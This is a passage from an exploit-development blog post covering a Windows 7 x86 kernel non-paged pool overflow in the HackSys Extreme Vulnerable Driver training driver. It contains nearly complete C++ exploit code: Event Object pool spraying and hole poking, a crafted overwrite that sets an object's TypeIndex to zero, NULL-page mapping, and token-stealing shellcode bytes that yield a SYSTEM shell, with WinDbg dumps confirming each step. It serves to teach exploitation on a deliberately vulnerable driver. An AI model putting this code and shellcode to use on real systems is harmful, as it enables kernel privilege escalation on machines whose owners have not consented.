 8628a500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a5c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a680 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a6c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a7c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a8c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a9c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628abc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628acc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628adc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628afc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

That looks pretty nice. We get a nice contiguous block of Event Objects just as we expected (bit weird that there’s a 0x80 byte hole in there…).

The next thing we need to do is examine the constituent parts of these Event Objects to find our overwrite target. I like to take a look at the memory pane and then, following along with the cited blog posts, parse out the meaning of the byte values. Here is the memory view for one of the Event Object allocations:

8628afc0 08 00 08 04 45 76 65 ee 00 00 00 00 40 00 00 00  ....Eve.....@...
8628afd0 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00  ................
8628afe0 00 00 00 00 0c 00 08 00 40 f9 37 86 00 00 00 00  ........@.7.....
8628aff0 01 00 04 34 00 00 00 00 f8 af 28 86 f8 af 28 86  ...4......(...(.

We can start parsing this by taking a look at the pool header:

kd> dt nt!_POOL_HEADER 8628afc0 
   +0x000 PreviousSize     : 0y000001000 (0x8)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001000 (0x8)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4080008
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

This looks pretty similar to what we’ve seen already. Obviously the PoolTag is different, but so is the Ulong1 value, and you can examine the binary constituent parts that make it up. Next we’ll look at the OBJECT_HEADER_QUOTA_INFO, which starts at offset 0x8 from the beginning of our allocation, and you can match it up with the bytes in the memory view:

kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 8628afc0+0x8
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null) 

So far, none of these values are ones we want our overwrite to change. Our overwrite has to keep all of this data intact, so we’ll have to write these same values into our input buffer. Next, we’ll finally start to approach our overwrite target when we parse out the OBJECT_HEADER:

kd> dt nt!_OBJECT_HEADER 8628afc0 + 8 + 10
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8637f940 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8637f940 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

This is where things start to get interesting, as the TypeIndex value right now is set to 0xc. 0xc is actually an array index value, like array[0xc]. This array is called the ObTypeIndexTable, and it is filled with pointers to OBJECT_TYPE structures. This is actually really cool in my opinion because we can test this out. Let’s first dump all the pointers stored in the ObTypeIndexTable.

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
82997770  84f46598 84fedf48 84fede08 84fedd40
82997780  84fedc78 84fedbb0 84fedae8 84fed410
82997790  85053520 8504f9c8 8504f900 8504f838
829977a0  8503f9c8 8503f900 8503f838 84ffb9c8
829977b0  84ffb900 84ffb838 84fef780 84fef6b8
829977c0  84fef5f0 8503b838 8503b770 8503b6a8
829977d0  85057590 850573a0 84ff3ca0 84ff3bd8

If the first entry, at address 82997760, is array index 0, then index 0xc sits at 82997760 + 0xc * 4 = 82997790 and holds the pointer 85053520. Let’s get WinDBG to spill the beans on this type and see if it’s indeed an Event Object.

kd> dt nt!_OBJECT_TYPE 85053520 -b
   +0x000 TypeList         : _LIST_ENTRY [ 0x85053520 - 0x85053520 ]
      +0x000 Flink            : 0x85053520 
      +0x004 Blink            : 0x85053520 
   +0x008 Name             : _UNICODE_STRING "Event"
      +0x000 Length           : 0xa
      +0x002 MaximumLength    : 0xc
      +0x004 Buffer           : 0x8ba06838  "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6bbf
   +0x01c TotalNumberOfHandles : 0x6c2b
   +0x020 HighWaterNumberOfObjects : 0x6bbf
   +0x024 HighWaterNumberOfHandles : 0x6c2b
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
      +0x000 Length           : 0x50
      +0x002 ObjectTypeFlags  : 0 ''
      +0x002 CaseInsensitive  : 0y0
      +0x002 UnnamedObjectsOnly : 0y0
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y0
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned     : 0y0
      +0x004 ObjectTypeCode   : 2
      +0x008 InvalidAttributes : 0x100
      +0x00c GenericMapping   : _GENERIC_MAPPING
         +0x000 GenericRead      : 0x20001
         +0x004 GenericWrite     : 0x20002
         +0x008 GenericExecute   : 0x120000
         +0x00c GenericAll       : 0x1f0003
      +0x01c ValidAccessMask  : 0x1f0003
      +0x020 RetainAccess     : 0
      +0x024 PoolType         : 0 ( NonPagedPool )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x40
      +0x030 DumpProcedure    : (null) 
      +0x034 OpenProcedure    : (null) 
      +0x038 CloseProcedure   : (null) 
      +0x03c DeleteProcedure  : (null) 
      +0x040 ParseProcedure   : (null) 
      +0x044 SecurityProcedure : 0x82abad90 
      +0x048 QueryNameProcedure : (null) 
      +0x04c OkayToCloseProcedure : (null) 
   +0x078 TypeLock         : _EX_PUSH_LOCK
      +0x000 Locked           : 0y0
      +0x000 Waiting          : 0y0
      +0x000 Waking           : 0y0
      +0x000 MultipleShared   : 0y0
      +0x000 Shared           : 0y0000000000000000000000000000 (0)
      +0x000 Value            : 0
      +0x000 Ptr              : (null) 
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x850535a0 - 0x850535a0 ]
      +0x000 Flink            : 0x850535a0 
      +0x004 Blink            : 0x850535a0 

Using the -b option here really saves us because it displays all levels of sub-structures within their parent structures. So, we have absolutely homed in on the pointer to the Event object type, as evidenced by this:

+0x008 Name             : _UNICODE_STRING "Event"

What gets cool here is that at offset 0x28 we see the TypeInfo structure. One of its members, CloseProcedure, is 0x38 deep into that TypeInfo structure. So starting from offset 0x0 of the data referenced by the OBJECT_TYPE pointer we found in the table, the CloseProcedure is located at offset 0x28 + 0x38, or 0x60. THIS is the function pointer that is called when we use the CloseHandle API to free these Event Objects from the non-paged pool. So this is our target.
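The offset arithmetic can be double-checked by mirroring the structures in plain C++ and letting the compiler compute the offsets. This is only a sketch under assumptions: the struct names with the 32 suffix are hypothetical, pointers are modeled as 32-bit integers, only the fields up to TypeInfo are included, and the table values are copied from the dd output above, so they are specific to that boot of that machine.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical 32-bit mirror of _OBJECT_TYPE_INITIALIZER, following the
// offsets printed by dt. Pointers are modeled as 32-bit integers.
struct ObjectTypeInitializer32 {
    std::uint16_t Length;                     // +0x000
    std::uint8_t  ObjectTypeFlags;            // +0x002
    std::uint8_t  Padding;                    // +0x003 (assumed padding)
    std::uint32_t ObjectTypeCode;             // +0x004
    std::uint32_t InvalidAttributes;          // +0x008
    std::uint32_t GenericMapping[4];          // +0x00c
    std::uint32_t ValidAccessMask;            // +0x01c
    std::uint32_t RetainAccess;               // +0x020
    std::uint32_t PoolType;                   // +0x024
    std::uint32_t DefaultPagedPoolCharge;     // +0x028
    std::uint32_t DefaultNonPagedPoolCharge;  // +0x02c
    std::uint32_t DumpProcedure;              // +0x030
    std::uint32_t OpenProcedure;              // +0x034
    std::uint32_t CloseProcedure;             // +0x038
    std::uint32_t DeleteProcedure;            // +0x03c
    std::uint32_t ParseProcedure;             // +0x040
    std::uint32_t SecurityProcedure;          // +0x044
    std::uint32_t QueryNameProcedure;         // +0x048
    std::uint32_t OkayToCloseProcedure;       // +0x04c
};

// Hypothetical 32-bit mirror of the start of _OBJECT_TYPE.
struct ObjectType32 {
    std::uint32_t TypeList[2];                // +0x000
    std::uint16_t NameLength;                 // +0x008
    std::uint16_t NameMaximumLength;          // +0x00a
    std::uint32_t NameBuffer;                 // +0x00c
    std::uint32_t DefaultObject;              // +0x010
    std::uint32_t Index;                      // +0x014 (UCHAR, widened to cover padding)
    std::uint32_t TotalNumberOfObjects;       // +0x018
    std::uint32_t TotalNumberOfHandles;       // +0x01c
    std::uint32_t HighWaterNumberOfObjects;   // +0x020
    std::uint32_t HighWaterNumberOfHandles;   // +0x024
    ObjectTypeInitializer32 TypeInfo;         // +0x028
};

static_assert(offsetof(ObjectType32, TypeInfo) == 0x28, "TypeInfo offset");
static_assert(offsetof(ObjectTypeInitializer32, CloseProcedure) == 0x38,
              "CloseProcedure offset");

constexpr std::uint32_t kCloseProcedureOffset = static_cast<std::uint32_t>(
    offsetof(ObjectType32, TypeInfo) +
    offsetof(ObjectTypeInitializer32, CloseProcedure));
static_assert(kCloseProcedureOffset == 0x60, "0x28 + 0x38");

// First 13 entries of the dd nt!ObTypeIndexTable output shown above.
constexpr std::uint32_t kObTypeIndexTable[] = {
    0x00000000, 0xbad0b0b0, 0x84f46728, 0x84f46660,
    0x84f46598, 0x84fedf48, 0x84fede08, 0x84fedd40,
    0x84fedc78, 0x84fedbb0, 0x84fedae8, 0x84fed410,
    0x85053520,
};

// Address the kernel would read the CloseProcedure pointer from for a
// given TypeIndex, according to this model.
std::uint32_t close_procedure_slot(std::uint8_t type_index) {
    assert(type_index < sizeof(kObTypeIndexTable) / sizeof(kObTypeIndexTable[0]));
    return kObTypeIndexTable[type_index] + kCloseProcedureOffset;
}
```

For the legitimate index 0xc this resolves to 0x85053520 + 0x60, while an index of 0x0 resolves to address 0x60 on the NULL page.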

If that is complicated I’ve tried to create a helpful diagram:

So what happens when we free the chunk with CloseHandle is the kernel goes to the address referenced by the array index value 0xc and looks at offset 0x60 from there for a function pointer and calls the function. Looking back at that table:

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
----SNIP----

The first entry in the table is 0x00000000, and we already know from our NULL pointer dereference exploit that we can map the NULL page on Windows 7 x86. So thanks to the aforementioned bloggers, our path forward is clear. We’ll ONLY corrupt the TypeIndex value of 0xc inside the OBJECT_HEADER so that it’s set to 0x0 instead. We’ll leave everything else the way it is with our overwrite. This way, when we free this chunk, the kernel will look for a function pointer at offset 0x60 from address 0x00000000. So we’ll just map the NULL page and place a pointer to our shellcode at offset 0x60.

Executing The Plan

Now that we know our plan of attack, we need to execute it.

The adjustment we need to make is to poke holes in this contiguous block so that when we get our buffer allocated the allocator slides it right between Event Objects. We know that it takes 8 Event Objects being freed to make a 0x200-sized hole, so following along with @FuzzySec, we’ll release 8 Event Object handles every 0x16 handles in our vector. Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x200 byte-sized holes in our sequential allocation...\n";
    for (size_t i = 0; i + 8 <= sequential_handles.size(); i = i + 0x16) {
        for (int x = 0; x < 8; x++) {
            BOOL freed = CloseHandle(sequential_handles[i + x]);
            if (freed == false) {
                cout << "[!] Unable to free sequential allocation!\n";
                cout << "[!] Last error: " << GetLastError() << "\n";
            }
        }
    }
    cout << "[>] Holes poked lol.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

After running it and looking up our post memcpy kernel buffer with the !pool command, we see that our 0x200 byte object was allocated precisely between two Event Objects! Everything is working as planned!

kd> !pool 862740c8
Pool page 862740c8 region is Nonpaged pool
 86274000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 86274040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274080 size:   40 previous size:   40  (Allocated)  Even (Protected)
*862740c0 size:  200 previous size:   40  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 862742c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862743c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862744c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862745c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274640 size:  200 previous size:   40  (Free)       Even
 86274840 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862748c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862749c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274bc0 size:  200 previous size:   40  (Free)       Even
 86274dc0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
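
The hole pattern in that dump can be sanity-checked without a debugger. The sketch below is a model only, not part of the exploit: `poke_holes` and `hole_bytes` are hypothetical helper names, and the only assumption is that sprayed chunks land contiguously in spray order. It mirrors the loop in spray_pool() (stride 0x16, 8 frees per stride), except that it stops early if a full run would not fit.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Model of the hole-poking loop: starting at every `stride`-th index,
// mark `run` consecutive sprayed chunks as freed. true == freed.
std::vector<bool> poke_holes(std::size_t count, std::size_t stride, std::size_t run) {
    std::vector<bool> freed(count, false);
    if (stride == 0) {
        return freed;  // avoid an endless loop on a bad stride
    }
    // Unlike the loop in spray_pool(), stop if a full run would not fit.
    for (std::size_t i = 0; i + run <= count; i += stride) {
        for (std::size_t x = 0; x < run; ++x) {
            freed[i + x] = true;
        }
    }
    return freed;
}

// Size in bytes of one hole made of `run` adjacent chunks.
constexpr std::size_t hole_bytes(std::size_t run, std::size_t chunk_size) {
    return run * chunk_size;
}
```

With 10,000 chunks, a stride of 0x16 and a run of 8, indices 0 to 7 are freed, 8 to 21 stay allocated, and the pattern repeats at 22. That matches the dump: 14 allocated 0x40 chunks between each 0x200 hole.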

Memory Corruption Engaged

Now that we can control the pool to a predictable degree, it’s time to overwrite that type index and change it from 0xc to 0x0. Everything else between our 0x200 allocation and this byte needs to remain the same or we’ll get a BSOD.

Let’s use the dd command to dump DWORD values from the beginning of the Event Object right after our kernel buffer. I’ll repaste the memory pane view of an Event Object here so you can see how I formulate the input buffer in the exploit code.

kd> dd 8627e780 
8627e780  04080040 ee657645 00000000 00000040
8627e790  00000000 00000000 00000001 00000001
8627e7a0  00000000 0008000c 8637f940 00000000
----SNIP----

Right. So we need to keep everything intact except the 0xc in the 0008000c DWORD, which we overwrite with 0x0. We’re overwriting 40 bytes in total, or 0x28, which gives us an input buffer size of 0x220 (0x1F8 + 0x28). We’ll make an overwrite_payload variable that is a byte buffer and we’ll copy it into the last 0x28 bytes of a 0x220 sized buffer, with our original \x42 values taking up the first 0x1F8 bytes, as follows:

    ULONG payload_len = 0x220;

    BYTE* input_buff = (BYTE*)VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    BYTE overwrite_payload[] = (
        "\x40\x00\x08\x04"  // pool header
        "\x45\x76\x65\xee"  // pool tag
        "\x00\x00\x00\x00"  // obj header quota begin
        "\x40\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x00\x00"  // obj header quota end
        "\x01\x00\x00\x00"  // obj header begin
        "\x01\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x08\x00" // 0xc converted to 0x0
        );

    memset(input_buff, '\x42', 0x1F8);
    memcpy(input_buff + 0x1F8, overwrite_payload, 0x28);
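
The buffer arithmetic can be written down as a small compile-time check. This is a sketch under the assumption that the field sizes are exactly what the comments on overwrite_payload say (Windows 7 x86); the constant and function names are made up for illustration.

```cpp
#include <cassert>
#include <cstddef>

// Sizes read off the comments on overwrite_payload (assumed Windows 7 x86).
constexpr std::size_t kFillerLen     = 0x1F8; // '\x42' bytes filling the driver's buffer
constexpr std::size_t kPoolHeaderLen = 0x8;   // pool header DWORD + pool tag DWORD
constexpr std::size_t kQuotaInfoLen  = 0x10;  // four "obj header quota" DWORDs
constexpr std::size_t kObjHeaderLen  = 0x10;  // object header DWORDs up to and including the type index DWORD

// Bytes written past the end of the driver's buffer.
constexpr std::size_t overwrite_len() {
    return kPoolHeaderLen + kQuotaInfoLen + kObjHeaderLen;
}

// Total user buffer length passed to DeviceIoControl.
constexpr std::size_t total_len() {
    return kFillerLen + overwrite_len();
}

// Offset, inside the overwrite, of the DWORD that holds the type index byte.
constexpr std::size_t type_index_dword_offset() {
    return overwrite_len() - 4;
}

static_assert(overwrite_len() == 0x28, "overwrite should be 40 bytes");
static_assert(total_len() == 0x220, "filler plus overwrite should be 0x220");
```

If a field size were off by even one DWORD, the type index byte would land in the wrong place, which is why it is worth checking the sum before sending anything to the driver.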

We’ll also want to allocate the NULL page, using code I pulled directly from tekwizz123.

void allocate_shellcode() {

    _NtAllocateVirtualMemory NtAllocateVirtualMemory = 
        (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateVirtualMemory");

    INT64 address = 0x1;
    int size = 0x100;

    // NtAllocateVirtualMemory returns an NTSTATUS, where 0 is STATUS_SUCCESS.
    NTSTATUS status = (NTSTATUS)NtAllocateVirtualMemory(
        GetCurrentProcess(),
        (PVOID*)&address,
        NULL,
        (PSIZE_T)&size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (status != 0) {
        cout << "[!] Unable to allocate NULL page...wtf?\n";
        cout << "[!] NTSTATUS: 0x" << hex << status << "\n";
        exit(1);
    }
    cout << "[>] NULL page mapped.\n";
    cout << "[>] Putting 'AAAA' on NULL page...\n";

    memset((void*)0x0, '\x41', 0x100);

}

I’ll also fill the NULL page with \x41 values so that when we run this code we should get an Access Violation exception with an eip value of 41414141.

Last but not least, we have to free our chunks so that the CloseProcedure is activated!

void free_chunks() {

    cout << "[>] Freeing defragmentation allocations...\n";
    for (int i = 0; i < defragment_handles.size(); i++) {

        BOOL freed = CloseHandle(defragment_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Defragmentation allocations freed.\n";
    cout << "[>] Freeing sequential allocations...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {

        BOOL freed = CloseHandle(sequential_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free sequential allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Sequential allocations freed.\n";
}

We run this code and what happens??

Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???

We did it!!

You can examine the pool allocations too. Look at the pool allocation right after our kernel buffer. We’ve replaced 0xc with 0x0 and you can see how it differs from the next Event Object, as I’ve marked both bytes with asterisks.

855b8af8 42 42 42 42 42 42 42 42 40 00 08 04 45 76 65 ee  BBBBBBBB@...Eve.
855b8b08 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b18 01 00 00 00 01 00 00 00 00 00 00 00 *00* 00 08 00  ................
855b8b28 80 82 14 85 00 00 00 00 01 00 04 00 00 00 00 00  ................
855b8b38 38 8b 5b 85 38 8b 5b 85 08 00 08 04 45 76 65 ee  8.[.8.[.....Eve.
855b8b48 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b58 01 00 00 00 01 00 00 00 00 00 00 00 *0c* 00 08 00  ................
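
To make the comparison concrete, the first 0x28 bytes of both chunks can be diffed byte by byte. The sketch below copies the bytes straight from the dump above; `diff_offsets` and the array names are hypothetical, and the reading of offset 0x0 as the pool header's previous-size field is my assumption based on the different neighbors in front of each chunk.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

using Header = std::array<std::uint8_t, 0x28>;

// Chunk at 855b8b00, right after our buffer (type index overwritten).
const Header kCorrupted = {{
    0x40, 0x00, 0x08, 0x04, 0x45, 0x76, 0x65, 0xee,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00,
}};

// Chunk at 855b8b40, the next untouched Event Object.
const Header kUntouched = {{
    0x08, 0x00, 0x08, 0x04, 0x45, 0x76, 0x65, 0xee,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x08, 0x00,
}};

// Returns every offset at which the two headers differ.
std::vector<std::size_t> diff_offsets(const Header& a, const Header& b) {
    std::vector<std::size_t> out;
    for (std::size_t i = 0; i < a.size(); ++i) {
        if (a[i] != b[i]) {
            out.push_back(i);
        }
    }
    return out;
}
```

Only two offsets differ: 0x24, which is the type index byte we changed, and 0x0, which looks like the previous-size field (the corrupted chunk sits behind a 0x200 chunk, the untouched one behind a 0x40 chunk).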

Now let’s just allocate some shellcode there…

Shellcode Implementation

We’re going to first use our shellcode from our Uninit Stack Variable exploit and see how far that gets us:

char Shellcode[] = (
		"\x60"
		"\x64\xA1\x24\x01\x00\x00"
		"\x8B\x40\x50"
		"\x89\xC1"
		"\x8B\x98\xF8\x00\x00\x00"
		"\xBA\x04\x00\x00\x00"
		"\x8B\x80\xB8\x00\x00\x00"
		"\x2D\xB8\x00\x00\x00"
		"\x39\x90\xB4\x00\x00\x00"
		"\x75\xED"
		"\x8B\x90\xF8\x00\x00\x00"
		"\x89\x91\xF8\x00\x00\x00"
		"\x61"
		"\xC3"
		);

These are my breakpoints right now:

kd> bp !HEVD+4D64
kd> ba r1 0x60
kd> bl
 0 e 8c295d64     0001 (0001) HEVD!TriggerNonPagedPoolOverflow+0xe6
 1 e 00000060 r 1 0001 (0001) 

Here is the disassembly pane after we hit our access breakpoint a few times (remember that that address will be accessed multiple times during our exploit). You can see we’re calling a function located at edi + 0x60 when edi is set to 0. So, this is our shellcode we’re about to run:

Here is the call stack:

We can see in the memory pane that we’re pushing 4 DWORDs onto the stack to set up our call to dword ptr [edi+0x60], which we need to clean up in our subroutine (shellcode). So our shellcode will end with a ret 0x10 instruction to compensate.

Getting an nt authority/system shell:

Full exploit code: here

Conclusion

That was a really fun one. Thanks again to the aforementioned authors and exploit writers. Even though this exploit vector involved some relatively old techniques, it was still fun for me and I learned a lot just about memory management in general and got some more experience in WinDBG. Until next time!

HEVD Exploits – Windows 7 x86 Use-After-Free

By: h0mbre
23 April 2020 at 04:00

Introduction

I’m continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver, using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from the strategies I saw employed in the blog posts, either out of necessity or because I was trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
